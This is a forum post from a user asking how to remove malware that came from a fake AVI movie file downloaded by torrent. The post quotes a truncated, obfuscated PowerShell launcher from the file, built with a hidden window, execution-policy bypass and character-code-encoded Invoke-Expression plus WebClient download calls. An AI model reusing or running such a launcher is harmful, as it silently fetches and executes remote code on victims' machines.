Hello all!
I made the dumb mistake of downloading what i thought was the old grinch movie through a torrent site (we have it on DVD but my daughter scratched it up), and it turns out it wasn't what i thought it was (shocking)
It was listed as an AVI file, but when i double clicked it i saw some powershell stuff flash, my windows defender was turned off. I quickly shut off the internet, grabbed malwarebytes form a different computer and installed it on the bad computer. (it's a fairly new computer with not much on it, and also I got windows defender turned back on by deleting some of the registry keys and restarting it....)
It scanned and quarantined and removed a handful of things, and i thought i was ok. When i use google my search results pop up then i can see some redirecting at the bottom of the browser to some strange sites, and then my results and whole page looks different. I found a topic close to my issue, but i am still running in to this issue. when i opened up the file (i removed it and deleted it from my recycle bin) here is what was listed in one of the sections....
file:///C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%20-NoPr%20-WINd%201%20-eXEc%20ByP%20-JoIN%20('73R69&88X40j78~101u119%7D45:79~98X106%7D101%7D99z116%7B32&83&121%7D115u116~101&109~46R78%7B101j116%7D46&87:101j98:67R108&105%7D101u110%7B116~41:46u68j111j119~110%7B108R111j97%7B100~83R116u11
It may be longer than that, but i'm not sure, that's all i could see....
Does anyone have any idea on how to fully remove this? I am at a loss.....
I also downloaded the farbar recovery tool. So please let me know what i need to run or what to do, i'm all ears!
Thanks for any help